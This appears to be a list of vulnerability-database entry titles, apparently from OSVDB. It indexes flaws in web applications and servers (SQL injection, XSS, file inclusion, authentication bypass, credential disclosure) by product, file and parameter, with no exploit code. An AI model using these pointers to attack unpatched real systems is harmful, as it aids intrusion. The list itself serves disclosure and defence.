[26763] IBM WebSphere Application Server (WAS) Unspecified JSP Source Disclosure (PK22928)
[26761] IBM WebSphere Application Server (WAS) Trace Datasource Password Cleartext Disclosure
[26626] Joomla! Web Link Submission title Parameter SQL Injection
[26624] Mambo Web Link Submission title Parameter SQL Injection
[26550] PHPWebGallery search.php id Parameter XSS
[26454] Cisco WebVPN Clientless Mode connecterror.html XSS
[26453] Cisco WebVPN Clientless Mode dnserror.html domain Parameter XSS
[26441] Microsoft Exchange Server Outlook Web Access HTML Parsing Unspecified XSS
[26410] MailEnable Enterprise WebMail ListAttachments.asp Password Disclosure
[26409] MailEnable Enterprise WebMail uploadcontact.asp Arbitrary File Upload
[26408] MailEnable Enterprise WebMail UploadAttachment.asp Arbitrary File Upload
[26407] MailEnable Enterprise WebMail Resolve.asp Arbitrary Draft Folder Mail Creation
[26406] MailEnable Enterprise WebMail MailOptions.asp LoginRights Variable Privilege Escalation
[26405] MailEnable Enterprise WebMail main.asp POSTOFFICE Variable Authentication Bypass
[26340] webprojectdb lang.php INCDIR Parameter Remote File Inclusion
[26339] webprojectdb nav.php INCDIR Parameter Remote File Inclusion
[26329] 4D WebSTAR Server Log Remote Disclosure
[26321] Cabacos Web CMS Suchergebnisse.asp suchtext Parameter XSS
[26267] CGI-RESCUE WebFORM / FORM2MAIL Arbitrary Mail Header Injection
[26156] TIBCO Hawk Hawk Monitoring Agent Configuration Interface Local Overflow
[26155] TIBCO Rendezvous Multiple Products HTTP Administrative Interface Remote Overflow
[26105] F@cile Interactive Web Multiple p-themes Directory index.inc.php myskin Parameter XSS
[26104] F@cile Interactive Web index.php lang Parameter XSS
[26103] F@cile Interactive Web Multiple p-themes Directory index.inc.php mytheme Parameter Remote File Inclusion
[26102] F@cile Interactive Web p-editbox.php pathfile Parameter Remote File Inclusion
[26101] F@cile Interactive Web p-editpage.php pathfile Parameter Remote File Inclusion
[26100] F@cile Interactive Web p-popupgallery.php l Parameter Remote File Inclusion
[26086] V-webmail pop3.php CONFIG[pear_dir] Parameter Remote File Inclusion
[26085] V-webmail core.php CONFIG[pear_dir] Parameter Remote File Inclusion
[26040] HyperStop Web Host Directory Write a Review Box XSS
[26039] HyperStop Web Host Directory Login Username Variable Path Disclosure
[26038] AlstraSoft Web Host Directory Write a Review Box XSS
[26037] AlstraSoft Web Host Directory Login Username Variable Path Disclosure
[26036] AlstraSoft Web Host Directory Search Function uri Parameter SQL Injection
[26012] EVA-Web index.php Multiple Variable Path Disclosure
[26011] EVA-Web index.php Multiple Parameter XSS
[26010] EVA-Web rubrique.php3 date Parameter XSS
[26009] EVA-Web article-album.php3 debut_image Parameter XSS
[26002] BlueShoes Framework websearchengine/Bs_Wse_Profile.class.php APP[path][plugins] Parameter Remote File Inclusion
[25995] WebspotBlogging inc/mainheader.inc.php path Parameter Remote File Inclusion
[25994] WebspotBlogging inc/global.php path Parameter Remote File Inclusion
[25993] WebspotBlogging inc/adminheader.inc.php path Parameter Remote File Inclusion
[25992] WebspotBlogging inc/logincheck.inc.php path Parameter Remote File Inclusion
[25971] Weblog Oggi Comment Body XSS
[25962] aspWebLinks links.asp linkID Parameter SQL Injection
[25938] WeBWorK PGProblemEditor.pm Traversal Arbitrary File Manipulation
[25937] F-Secure Multiple Products Web Console Pre-authentication Overflow
[25927] Spymac WebOS login.php XSS
[25926] Spymac WebOS get_ipod.php curr Parameter XSS
[25925] Spymac WebOS index.php Multiple Parameter XSS
[25893] Fujitsu MyWeb Products Unspecified SQL Injection
[25889] Apple Mac OS X Xcode Tools WebObjects Plugin Project Manipulation
[25857] Destiney Rated Images Script addWeblog.php XSS
[25846] Symantec Client Security / AntiVirus Management Interface Remote Overflow
[25842] WebCalendar index.php includedir Function Remote File Inclusion
[25833] IceWarp WebMail index.html PHPSESSID Parameter XSS
[25831] HyperStop Web Host Directory /search/index.php uri Parameter SQL Injection
[25807] MY Web Server URL Processing Overflow DoS
[25738] PunkBuster WebTool webkey Authentication Overflow
[25682] Limbo CMS weblinks.html.php catid Parameter SQL Injection
[25634] Sun ONE/Java System Web Server Error Page XSS
[25626] Bitrix Site Manager Admin Interface Multiple XSS
[25607] Blog Mod weblog_posting.php r Parameter SQL Injection
[25559] Website Baker details.php display_name Parameter XSS
[25557] BEA WebLogic SOAP Fault Stack Trace Information Disclosure
[25556] BEA WebLogic Invalid XML Exception Information Disclosure
[25555] BEA WebLogic GetIORServlet Internal Server Information Disclosure
[25554] BEA WebLogic T3 Connection Internal Information Disclosure
[25553] BEA WebLogic stopWeblogic.sh Cleartext Administrator Password Disclosure
[25552] BEA WebLogic Untrusted Application Private Key Disclosure
[25551] BEA WebLogic JDBC Security Policy Setting Failure
[25550] BEA WebLogic Server Log Cleartext Authentication Credential Disclosure
[25549] BEA WebLogic Administration Console Login Form Domain Name Disclosure
[25548] BEA WebLogic Administration Console Internal IP Address Disclosure
[25547] BEA WebLogic Compilation Error JSP Source Disclosure
[25546] BEA WebLogic Password Reset Mechanism Cleartext Admin Password Disclosure
[25545] BEA WebLogic Client Connection Manager QoS Protocol Downgrade
[25544] BEA WebLogic JTA Transaction Cleartext Information Disclosure
[25468] Web-Labs CMS E-mail Alert Signup Multiple Field XSS
[25467] Web-Labs CMS Search Function search Parameter XSS
[25453] Cisco PIX/ASA/FWSM WebSense URL Filter Bypass
[25424] IBM WebSphere Application Server (WAS) Web Container JSP Source Disclosure (PK20181,PK13792)
[25423] IBM WebSphere Application Server (WAS) Client Verification Unspecified Issue
[25422] IBM WebSphere Application Server (WAS) Trace Database Password Cleartext Disclosure
[25420] IBM WebSphere Application Server (WAS) Trace Unspecified Information Disclosure (PK11017)
[25418] IBM WebSphere Application Server (WAS) Session Trace Unspecified Information Disclosure (PK05011)
[25417] IBM WebSphere Application Server (WAS) Session Trace Information Disclosure (PK05011)
[25415] IBM WebSphere Application Server (WAS) Publish/subscribe Behaviour Issue
[25414] IBM WebSphere Application Server (WAS) specj One Phase Commit Optimization Unspecified Issue
[25413] IBM WebSphere Application Server (WAS) FFDC Log Information Disclosure (PK04923|PK07366)
[25412] IBM WebSphere Application Server (WAS) Set-Cookie Header Expiration Failure
[25411] IBM WebSphere Application Server (WAS) JMS Message Processing DoS
[25410] IBM WebSphere Application Server (WAS) Plug-in Malformed Request DoS
[25407] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Password Disclosure (PK02503)
[25406] IBM WebSphere Application Server (WAS) META-INF / WEB-INF Directory Access
[25405] IBM WebSphere Application Server (WAS) Unspecified Password Disclosure (PK03448 #1)
[25404] IBM WebSphere Application Server (WAS) Unspecified Password Disclosure (PK03448 #2)
[25403] IBM WebSphere Application Server (WAS) Unspecified Secint XSS (PQ99687)
[25402] IBM WebSphere Application Server (WAS) ORBRas Trace Truststore Cleartext Password Disclosure
[25401] IBM WebSphere Application Server (WAS) EJB Security Role Mismatch
[25400] IBM WebSphere Application Server (WAS) on Windows Registry Cleartext Credential Disclosure
[25399] IBM WebSphere Application Server (WAS) URL Pattern Matching Failure
[25398] IBM WebSphere Application Server (WAS) Directory Request Page Authentication Bypass
[25397] IBM WebSphere Application Server (WAS) Unspecified HTTP Response Splitting
[25396] IBM WebSphere Application Server (WAS) Role Name Change Security Constraint Failure
[25395] IBM WebSphere Application Server (WAS) ESI/plugin Cached Secure Content Disclosure
[25394] IBM WebSphere Application Server (WAS) JVM MBEAN Disclosure
[25393] IBM WebSphere Application Server (WAS) Cloudscape Unspecified Exposure
[25392] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue
[25391] IBM WebSphere Application Server (WAS) SSL Offloader Protocol Mismatch Information Disclosure
[25390] IBM WebSphere Application Server (WAS) J_password Trace Cleartext Disclosure
[25389] IBM WebSphere Application Server (WAS) Global Security CA Trust Override
[25388] IBM WebSphere Application Server (WAS) stdout Cleartext Password Disclosure
[25387] IBM WebSphere Application Server (WAS) FFDC Log JMS Wrapped Object Cleartext Password Disclosure
[25386] IBM WebSphere Application Server (WAS) Private HTTP Header Disclosure
[25385] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Password Disclosure (PQ79848)
[25384] IBM WebSphere Application Server (WAS) ESI Cache Component simplefileservlet Exposure
[25383] IBM WebSphere Application Server (WAS) MQ Queue Destination Cleartext Password Disclosure
[25382] IBM WebSphere Application Server (WAS) ConnectionFactories Binding Info Unspecified Issue
[25381] IBM WebSphere Application Server (WAS) ESIInvalidatorControllerProxyImpl Unspecified Access Issue
[25380] IBM WebSphere Application Server (WAS) v6 Trace Cleartext Database Password Disclosure
[25379] IBM WebSphere Application Server (WAS) HTTP Request Handlers Unspecified Exposure
[25378] IBM WebSphere Application Server (WAS) Caching Proxy Error Page XSS
[25377] IBM WebSphere Application Server (WAS) Trace Session Context Information Disclosure
[25375] IBM WebSphere Application Server (WAS) on Solaris Corrupt Token Authentication Bypass
[25374] IBM WebSphere Application Server (WAS) Multiple Model Trace Information Disclosure (PK14566)
[25373] IBM WebSphere Application Server (WAS) HTTP Request Handlers Unspecified Exposure
[25372] IBM WebSphere Application Server (WAS) addNode.log Cleartext Credential Disclosure (PK16492)
[25371] IBM WebSphere Application Server (WAS) SOAP Port Unspecified Issue
[25370] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue
[25369] IBM WebSphere Application Server (WAS) URL Unspecified Script Execution (PK15571)
[25368] IBM WebSphere Application Server (WAS) Welcome Page Security Bypass
[25359] openEngine website.php template Parameter Local File Inclusion
[25299] SWS Web Server Syslog Call Format String
[25298] SWS Web Server Long Request Overflow
[25288] Web4Future Portal Solutions view.php ID Parameter XSS
[25287] Web4Future Portal Solutions comentarii.php ID Parameter XSS
[25286] Web4Future Portal Solutions view.php ID Parameter SQL Injection
[25285] Web4Future Portal Solutions comentarii.php ID Parameter SQL Injection
[25283] Xeneo Web Server Crafted Request Script Source Disclosure
[25280] WebCalendar Login Error Message User Account Enumeration
[25257] Big Webmaster Guestbook addguest.cgi Multiple Field XSS
[25245] Quagga bgpd Telnet Interface Local DoS
[25211] Websense Crafted URL Uncategorized Filter Bypass
[25146] WebGlimpse webglimpse.cgi Unspecified XSS
[25066] Network Administration Visualized (NAV) Report Interface SQL Injection
[25063] Kmail webdisk.php ordner Parameter XSS
[25000] Océ 3121/3122 Printer Web Server Overflow DoS
[24975] phpWebFTP index.php port Parameter XSS
[24971] Fujitsu NetShelter/FW Web Cache/Proxy Unspecified DNS Packet Handling Remote DoS
[24952] Manila editInBrowser Webpage Example Field XSS
[24939] PHPWebGallery picture.php cat Variable Arbitrary Picture Disclosure
[24872] WebGlimpse URL Control Character Arbitrary Command Execution
[24871] WebGlimpse InputSyntax Commercial Module Command Execution
[24843] Oracle E-Business Suite Diagnostics Interfaces Unspecified HTTP Issue
[24815] WebCleaner Unspecified HTML Security Bypass
[24806] Asterisk Recording Interface (ARI) misc/audio.php recording Parameter Traversal Arbitrary File Access
[24805] Asterisk Recording Interface (ARI) includes/main.conf Remote Credential Disclosure
[24707] phpWebFTP index.php language Parameter Traversal Arbitrary File Access
[24688] phpWebSite topics.php topic Parameter SQL Injection
[24646] phpWebSite index.php hub_dir Arbitrary File Inclusion
[24632] TinyWebGallery (TWG) index.php twg_album Parameter XSS
[24629] HP System Management Homepage (SMH) Crafted URL Interface Authentication Bypass
[24621] Web+Shop store.wml storeid Variable Path Disclosure
[24594] IBM WebSphere Large HTTP Header Request DoS
[24573] Awebs Banner Generator index.php banner Parameter XSS
[24572] Awebs Scripts Seller buy.php Predictable Cookie Authentication Bypass
[24536] WebCalendar /includes/menu/index.php Direct Request Path Disclosure
[24535] WebCalendar /includes/js/pref.php Direct Request Path Disclosure
[24534] WebCalendar /includes/js/popups.php Direct Request Path Disclosure
[24533] WebCalendar /includes/js/export_import.php Direct Request Path Disclosure
[24532] WebCalendar /includes/js/edit_layer.php Direct Request Path Disclosure
[24531] WebCalendar /includes/js/edit_entry.php Direct Request Path Disclosure
[24530] WebCalendar /includes/js/admin.php Direct Request Path Disclosure
[24529] WebCalendar /includes/settings.php.orig Direct Request Path Disclosure
[24528] WebCalendar /includes/settings.php Direct Request Path Disclosure
[24527] WebCalendar /includes/index.php Direct Request Path Disclosure
[24526] WebCalendar /includes/init.php Direct Request Path Disclosure
[24525] WebCalendar /tests/all_tests.php Direct Request Path Disclosure
[24524] WebCalendar /tests/add_duration_test.php Direct Request Path Disclosure
[24523] WebCalendar nonusers.php Direct Request Path Disclosure
[24522] WebCalendar groups.php Direct Request Path Disclosure
[24511] Web+Shop department.wml deptname Parameter XSS
[24504] PHPWebGallery picture.php Multiple Parameter XSS
[24503] PHPWebGallery category.php Multiple Parameter XSS
[24477] apt-webshop-system modules.php Remote File Inclusion
[24476] apt-webshop-system Malformed SQL Query Path Disclosure
[24475] apt-webshop-system artikel Module Multiple Parameter SQL Injection
[24469] Cherokee Web Server Error 400 XSS
[24379] WebMe Multiple Unspecified Security Issues
[24366] McAfee WebShield SMTP Bounce Message Format String
[24352] aWebBB search.php q Parameter SQL Injection
[24351] aWebBB reply_log.php Username Parameter SQL Injection
[24350] aWebBB reply.php Username Parameter SQL Injection
[24349] aWebBB post.php Username Parameter SQL Injection
[24348] aWebBB ndis.php Multiple Parameter SQL Injection
[24347] aWebBB login.php Username Parameter SQL Injection
[24346] aWebBB list.php c Parameter SQL Injection
[24345] aWebBB fpass.php Username Parameter SQL Injection
[24344] aWebBB feedback.php Username Parameter SQL Injection
[24343] aWebBB editac.php Username Parameter SQL Injection
[24342] aWebBB dpost.php p Parameter SQL Injection
[24341] aWebBB changep.php Username Parameter SQL Injection
[24340] aWebBB accounts.php Username Parameter SQL Injection
[24339] aWebBB editac.php Multiple Parameter XSS
[24338] aWebBB register.php Multiple Parameter XSS
[24337] aWebBB post.php Multiple Parameter XSS
[24336] aWebNews visview.php _GET['cid'] Parameter SQL Injection
[24335] aWebNews fpass.php user123 Parameter SQL Injection
[24334] aWebNews login.php user123 Parameter SQL Injection
[24333] aWebNews visview.php Multiple Parameter XSS
[24295] Hitachi Groupmax World Wide Web Multiple Products Unspecified XSS
[24279] web-app.net WebAPP mods/calendar/index.cgi vsSD Parameter XSS
[24278] web-app.net WebAPP index.cgi Multiple Parameter XSS
[24178] Blazix Web Server Crafted Filename Extension JSP Source Disclosure
[24160] WEBalbum skin2 Cookie Parameter Traversal Local File Inclusion
[24130] Web Quiz student.asp msg Parameter XSS
[24129] Web Quiz prequiz.asp exam Parameter XSS
[24123] uniForum websecadmin.aspx Multiple Field XSS
[24100] Quick 'n Easy Web Server Crafted File Name ASP Code Disclosure
[24099] Baby Web Server Crafted File Name ASP Code Disclosure
[24062] RealNetworks Multiple Products Web Page Embedded Player Content Overflow
[24060] webcheck Generated Report Tooltip XSS
[24045] phpWebSite article.php sid Parameter SQL Injection
[24044] phpWebSite friend.php sid Parameter SQL Injection
[24029] BEA WebLogic Portal JSR-168 Portlets Cached Display Cross Session Disclosure
[24028] BEA WebLogic Unspecified Internal Servlet Arbitrary File Access
[24027] BEA WebLogic Non-canonicalized XML Processing DoS
[24023] 1WebCalendar mainCal.cfm SQL Injection
[24022] 1WebCalendar /news/newsView.cfm NewsID Parameter SQL Injection
[24021] 1WebCalendar viewEvent.cfm EventID Parameter SQL Injection
[24014] MailEnable WebMail Malformed Encoded Quoted-printable Mail DoS
[23946] Maian Weblog mail.php Multiple Parameter SQL Injection
[23945] Maian Weblog print.php Multiple Parameter SQL Injection
[23939] BorderWare MXtreme Mail Firewall Web Administration Unspecified Issue
[23877] Winmail Webmail Multiple Unspecified Issues
[23805] Easy File Sharing Web Server Unspecified System File Disclosure
[23798] IBM WebSphere Unspecified JSP Source Disclosure
[23795] Easy File Sharing Web Server option.ini Remote Information Disclosure
[23794] Easy File Sharing Web Server /log/ Directory Log Disclosure
[23793] Easy File Sharing Web Server File/Folder Description Field XSS
[23792] Easy File Sharing Web Server Format String DoS
[23791] Easy File Sharing Web Server Full Path Request Arbitrary File Upload
[23727] XEROX CopyCentre/WorkCentre Web Server Unspecified Memory Corruption DoS
[23636] Apple Safari WebKit HTML Processing Overflow
[23635] WebGUI setParent Function User Permission Check Failure
[23634] WebGUI editBranchSave Method User Permission Check Failure
[23633] WebGUI Package Deployment Permission Check Failure
[23628] SAP Web Application Server HTTP Response Prefixing Issue
[23621] Archangel Weblog /admin/index.php index Parameter Remote File Inclusion
[23620] Archangel Weblog Cookie ba_admin Variable Admin Authentication Bypass
[23543] NetworkActiv Web Server Crafted Filename Request Script Source Disclosure
[23530] iGENUS Webmail config_inc.php SG_HOME Parameter Local File Inclusion
[23512] ArGoSoft Mail Server Pro Webmail viewheaders Multiple Field XSS
[23502] Issue Dealer Local Weblog Publisher Issue Disclosure
[23500] South River WebDrive Name Field Overflow DoS
[23492] Uniden UIP1868P Default Web Admin Password
[23478] Website Generator process3.php Arbitrary PHP Code Execution
[23473] ArGoSoft Mail Server Pro Webmail viewheaders UIDL Parameter Traversal Arbitrary File Access
[23469] WEBInsta Limbo Contact Form Arbitrary HTML Injection
[23468] DEV web management system register.php mesto Parameter XSS
[23411] CPG Dragonfly CMS Web_Links Module Multiple Parameter XSS
[23387] Web Calendar Pro dropbase.php tabls Parameter SQL Injection DoS
[23384] SquirrelMail webmail.php right_frame Parameter XSS
[23338] IBM Lotus Domino Web Server Unspecified Malformed URL DoS
[23336] MUTE P2P MWebCache Host Selection Information Disclosure
[23334] IBM Lotus Domino Web Server Unspecified Security Issue (KSPR66USSU)
[23333] IBM Lotus Domino Web Server Unspecified Memory Overwrite
[23332] IBM Lotus Domino Web Server Document Processing DoS
[23331] IBM Lotus Domino Web Navigator Malformed URL Notes DoS
[23278] PerlBLOG POST Method weblog.pl Multiple Parameter XSS
[23277] PerlBLOG weblog.pl Traversal Arbitrary File Access
[23276] PerlBLOG weblog.pl Arbitrary File Creation
[23266] WordPress wp-comments-post.php Author's Website Field XSS
[23262] V-webmail help.php Direct Request Path Disclosure
[23261] V-webmail frameset.php rframe Variable Arbitrary Remote HTML Inclusion
[23260] V-webmail preferences.personal.php newid Parameter XSS
[23236] @Mail Webmail Message HTML Image Tag XSS
[23228] Microsoft Outlook Web Access .INC File Direct Request Source Disclosure
[23225] webSPELL search.php SQL Injection
[23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow
[23105] WebGUI Anonymous Registration Restriction Bypass
[23090] noweb Multiple Script Insecure Temporary File Creation
[23088] Sun Java Web Start Untrusted Application Privilege Escalation
[23033] MailEnable Enterprise Edition Webmail Crafted Quoted-printable Email DoS
[22990] NukedWeb GuestBookHost Multiple Field XSS
[22971] cPanel dowebmailforward.cgi fwd Parameter XSS
[22906] cPanel webmailaging.cgi numdays Parameter XSS
[22893] Mozilla Multiple Products Location/Navigation Objects QueryInterface Memory Corruption
[22892] Mozilla Multiple Products Web Page Title Processing Overflow DoS
[22882] @Mail Webmail compose.pl unique Variable Traversal Arbitrary File Upload
[22813] Connect Daily Web Calendar Anonymous Viewing Calendar Disclosure
[22812] Connect Daily Web Calendar Unapproved Item Disclosure
[22807] UebiMiau Webmail HTML Email Body XSS
[22798] GNU CLISP SYSLOG Interface Format String
[22778] BEA WebLogic Cross Domain Administrator Access
[22777] BEA WebLogic RMI MBean Attribute Disclosure
[22776] BEA WebLogic Server Log Remote Disclosure
[22775] BEA WebLogic Configuration Auditing Log Cleartext Credential Disclosure
[22774] BEA WebLogic Application Code Password Decryption
[22773] BEA WebLogic Security Provider Activation Weakness
[22772] BEA WebLogic Connection Filters Unspecified Remote DoS
[22771] BEA WebLogic Untrusted Application SSL Identity Disclosure
[22770] BEA WebLogic Admin Console JNDI Resource Security Policy Issue
[22769] BEA WebLogic RDBMS Authentication config.xml Cleartext Password Disclosure
[22768] BEA WebLogic Portal Deployment Descriptors File Source Disclosure
[22767] BEA WebLogic WSRP Crafted Request Restriction Bypass
[22758] WeBWorK Unspecified Arbitrary Command Execution
[22753] my little weblog weblog.php BBcode link Tag XSS
[22741] SaralBlog New Comment Website Field XSS
[22722] Phpclanwebsite pollresults.php poll_id Parameter XSS
[22721] Phpclanwebsite uploader.php Path Disclosure
[22720] Phpclanwebsite index.php par Parameter SQL Injection
[22699] Note-A-Day Weblog /archive Directory Direct Request User Credential Disclosure
[22675] IronWall Web Server Traversal Arbitrary File Access
[22670] WebspotBlogging login.php Username Field SQL Injection
[22631] Kerio WinRoute Firewall Unspecified Web Browsing DoS
[22627] Phpclanwebsite img BBcode Tag XSS
[22617] Oracle E-Business Suite/Applications Web Applications Desktop Integration HTTP Information Disclosure
[22420] Chimera Web Portal System linkcategory.php id Parameter SQL Injection
[22398] Web Wiz Forums search_form.asp search Parameter XSS
[22387] OrjinWeb E-commerce index.php page Parameter Remote File Inclusion
[22383] Chimera Web Portal System modules.php Multiple Parameter XSS
[22339] Clearswift MIMEsweeper/WEBsweeper Crafted Executable Filter Bypass
[22295] TheWebForum register.php www Parameter XSS
[22294] TheWebForum login.php Username Field SQL Injection
[22289] WebGUI DataForm Entries XSS
[22280] SysCP WebFTP Module webftp.php webftp_language Parameter Local File Inclusion
[22244] Apple AirPort Extreme Base Station Crafted Packet Network Interface DoS
[22227] WebEOC Failed Login Account Lockout DoS
[22222] PHP Web Statistik Referer Field Disk Space Exhaustion DoS
[22204] Open-Xchange Webmail HTML Attachment Arbitrary Script Insertion
[22164] Tolva PHP website system usermods.php ROOT Parameter Remote File Inclusion
[22148] Web Wiz Multiple Products check_user.asp txtUserName Parameter SQL Injection
[22140] VEGO Web Forum index.php theme_id Parameter SQL Injection
[22119] VMware ESX Server Management Interface Unspecified XSS
[22113] RoundCube Webmail _task Variable Path Disclosure
[22102] IBM WebSphere /TechnologySamples/MovieReview2_1/ Multiple Field XSS
[22101] IBM WebSphere /TechnologySamples/Subscription/SubscriptionJSP.jsp Email Field XSS
[22100] IBM WebSphere /TechnologySamples/BulletinBoard/index.html message Field XSS
[22099] IBM WebSphere /PlantsByWebSphere/login.jsp Email Field XSS
[22082] IceWarp WebMail /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access
[22081] IceWarp WebMail /mail/index.html lang_settings Parameter Remote File Inclusion
[22080] IceWarp WebMail /mail/settings.html Language Parameter Local File Inclusion
[22079] IceWarp WebMail /dir/include.html lang Parameter Local File Inclusion
[22078] IceWarp WebMail /admin/inc/include.php Multiple Parameter Remote File Inclusion
[22077] IceWarp WebMail /accounts/inc/include.php Multiple Parameter Remote File Inclusion
[22043] DEV web management system add.php Multiple Parameter XSS
[22042] DEV web management system download_now.php target Parameter SQL Injection
[22041] DEV web management system getfile.php cat Parameter SQL Injection
[22040] DEV web management system openforum.php cat Parameter SQL Injection
[22000] Michael Arndt WebCal Multiple Function XSS
[21999] Michael Arndt WebCal webcal.cgi Multiple Parameter XSS
[21940] Business Objects WebIntelligence Arbitrary User Account Lockout
[21915] Adaptive Website Framework (AWF) Unspecified Script mode Variable Path Disclosure
[21914] Adaptive Website Framework (AWF) Multiple Templates page Parameter XSS
[21910] WebDB Search Module search Parameter SQL Injection
[21903] MarmaraWeb E-commerce index.php page Variable Arbitrary Command Execution
[21902] MarmaraWeb E-commerce index.php page Parameter XSS
[21815] BTGrup Admin WebController Script Login Multiple Field SQL Injection
[21791] WebGlimpse webglimpse.cgi Multiple Parameter XSS
[21786] Hot Banana Web Content Management Suite /search/index.cfm keywords Parameter XSS
[21691] PHPWebGallery picture.php image_id Parameter SQL Injection
[21690] PHPWebGallery category.php search Parameter SQL Injection
[21689] PHPWebGallery comments.php Multiple Parameter SQL Injection
[21656] phpWebThings myaccount.php sel_avatar Parameter SQL Injection
[21655] phpWebThings index.php menuoption Parameter SQL Injection
[21654] phpWebThings guestbook.php tekst Parameter SQL Injection
[21653] phpWebThings forum_write.php Multiple Parameter SQL Injection
[21652] phpWebThings forum_edit.php Multiple Parameter SQL Injection
[21651] phpWebThings forum.php Multiple Parameter SQL Injection
[21650] phpWebThings download.php ref Parameter SQL Injection
[21597] Basilix Webmail Email Multiple Field XSS
[21596] Basilix Webmail id Parameter SQL Injection
[21595] Basilix Webmail Attachment Crafted POST Arbitrary File Access
[21594] Basilix Webmail tmp Directory Permission Weakness Attachment Disclosure
[21588] BEA WebLogic LoginForm.jsp ADMINCONSOLESESSION Parameter Traversal Arbitrary File Access
[21587] BEA WebLogic /examplesWebApp/JWS_WebService.jsp XSS
[21572] Website Baker user: Field SQL Injection
[21469] Web4Future KeyWord Frequency Counter index.cgi url Parameter XSS
[21468] Web4Future eCommerce viewbrands.php bid Parameter SQL Injection
[21467] Web4Future eCommerce index.php Multiple Parameter SQL Injection
[21466] Web4Future eCommerce view.php Multiple Parameter SQL Injection
[21457] Web4Future Affiliate Manager Pro functions.php pid SQL Injection
[21448] Webalizer Xtended Malformed DNS Hostname DoS
[21447] Webalizer Xtended Unspecified XSS
[21446] Webalizer Xtended DNS Resolver Overflow
[21423] Web4Future Portal Solutions arhiva.php dir Parameter Traversal Arbitrary File Access
[21422] Web4Future Portal Solutions comentarii.php idp Parameter SQL Injection
[21421] Web4Future eDating Professional fq.php cid Parameter SQL Injection
[21420] Web4Future eDating Professional articles.php cat Parameter SQL Injection
[21419] Web4Future eDating Professional gift.php cid Parameter SQL Injection
[21418] Web4Future eDating Professional index.php Multiple Parameter SQL Injection
[21383] WebCalendar layers_toggle.php ret Variable HTTP Response Splitting
[21382] WebCalendar edit_report_handler.php time_range Parameter SQL Injection
[21366] CGI Online Worldweb Shopping (COWS) diagnose.cgi XSS
[21365] CGI Online Worldweb Shopping (COWS) compatible.cgi XSS
[21288] WASD Web Server PerlRTE_example1.pl name Variable Format String
[21276] Apple Mac OS X WebKit Crafted Content Overflow
[21222] Webmin/Usermin miniserv.pl Format String Remote Code Execution
[21221] Gallery Add Image From Web XSS
[21220] WebCalendar export_handler.php Arbitrary Data File Overwrite
[21219] WebCalendar export_handler.php Multiple Parameter SQL Injection
[21218] WebCalendar edit_template.php template Parameter SQL Injection
[21217] WebCalendar admin_handler.php Multiple Parameter SQL Injection
[21216] WebCalendar activity_log.php startid Parameter SQL Injection
[21212] PHP Web Statistik pixel.php Referer Header XSS
[21211] PHP Web Statistik stat.php lastnumber Variable Resource Consumption DoS
[21210] PHP Web Statistik logdb.dta Log Database Remote Disclosure
[21209] PHP Web Statistik /stat/stat.cfg Remote Information Disclosure
[21208] PHP Web Statistik stat.php lastnumber Parameter XSS
[21207] FreeWebStat pixel.php Multiple Parameter XSS
[21129] AllWeb Search index.php search Parameter SQL Injection
[21084] Softbiz Web Host Directory Failed SQL Query Path Disclosure
[21083] Softbiz Web Host Directory Search Engine SQL Injection
[21082] Softbiz Web Host Directory email.php h_id Parameter SQL Injection
[21081] Softbiz Web Host Directory browsecats.php cid Parameter SQL Injection
[21080] Softbiz Web Host Directory review.php sbres_id Parameter SQL Injection
[21079] Softbiz Web Host Directory search_result.php cid Parameter SQL Injection
[21004] IBM WebSphere Application Server (WAS) for z/OS BBOORB Module Double-free DoS
[20987] BEA WebLogic Restricted Page Multiple Slash Authorization Bypass
[20950] Sony CD SunnComm MediaMax Uninstallation AxWebRemoveCtrl ActiveX Control Arbitrary Code Execution
[20945] phpWebThing download.php file Parameter SQL Injection
[20922] Revize CMS setWebSpace.jsp Multiple Parameter XSS
[20920] Revize CMS query_input.jsp webspace Parameter SQL Injection
[20908] LiteSpeed Web Server WebAdmin confMgr.php m Parameter XSS
[20907] Spymac WebOS Notes index.php Multiple Parameter XSS
[20906] Spymac WebOS Blogs blog.php caldate Parameter XSS
[20905] Spymac WebOS Blogs blog_edit_entry.php entry Parameter XSS
[20904] Spymac WebOS Blogs blog_newentry_comment.php entry Parameter XSS
[20903] Spymac WebOS Blogs blog_newentry.php Multiple Parameter XSS
[20902] Spymac WebOS Blogs index.php curr Parameter XSS
[20878] Barracuda Spam Firewall User Interface Multiple Field XSS
[20877] Belkin Wireless Router Web Management Multiple Session Authentication Bypass
[20872] Webmin RPM Installation /var/webmin Permission Weakness Information Disclosure
[20721] phpWebThing forum.php forum Parameter XSS
[20717] SAP Web Application Server Test Application BspApplication Field XSS
[20716] SAP Web Application Server frameset.htm sap-syscmd Parameter XSS
[20715] SAP Web Application Server Error Page XSS
[20714] SAP Web Application Server sap-exiturl Header HTTP Response Splitting
[20676] Linux Kernel sysctl Interface Unregistration Local DoS
[20671] Sony/Lenovo InstallShield DWUSWebAgent.WebAgent.1 ActiveX Arbitrary Registry Entry Access
[20628] Oracle Application Server Web Cache Unspecified Trivial Remote DoS
[20627] Oracle Application Server Web Cache Administrator HTTP Unspecified Issue
[20626] Oracle Application Server Web Cache HTTP Unspecified Difficult Issue
[20625] Oracle Application Server Web Cache HTTP Unspecified Trivial Information Disclosure
[20611] Oracle Database Programmatic Interface alter session Unspecified SQL Issue
[20522] Invision Power Board Admin Interface Calendar Title XSS
[20521] Invision Power Board Admin Interface Group Icon Image Field XSS
[20520] Invision Power Board Admin Interface New Member Creation XSS
[20518] Invision Power Board Admin Interface Member Profile Multiple Field XSS
[20517] Invision Power Board Admin Interface APC Notes XSS
[20490] Rockliffe MailSite Express WebMail AttachPath Arbitrary Attachment Access
[20489] Rockliffe MailSite Express WebMail File Upload Arbitrary Command Execution
[20488] Rockliffe MailSite Express WebMail Email Message Body XSS
[20453] F-Secure Products Web Console Traversal Arbitrary File Access
[20447] Hasbani WindWeb Integrated Web Server Malformed GET Request DoS
[20441] phpWebThing forum.php forum Parameter SQL Injection
[20431] Apple Mac OS X Unspecified Kernel Interface Local Information Disclosure
[20375] Hitachi Web Page Generator Enterprise Session Manager Cookie Secure Attribute Issue
[20327] RTIS WebAdmin Login Multiple Field SQL Injection
[20317] RSA ACE/Agent for Web image onError Parameter XSS
[20293] PHP-Nuke Web_Links Module description Parameter SQL Injection
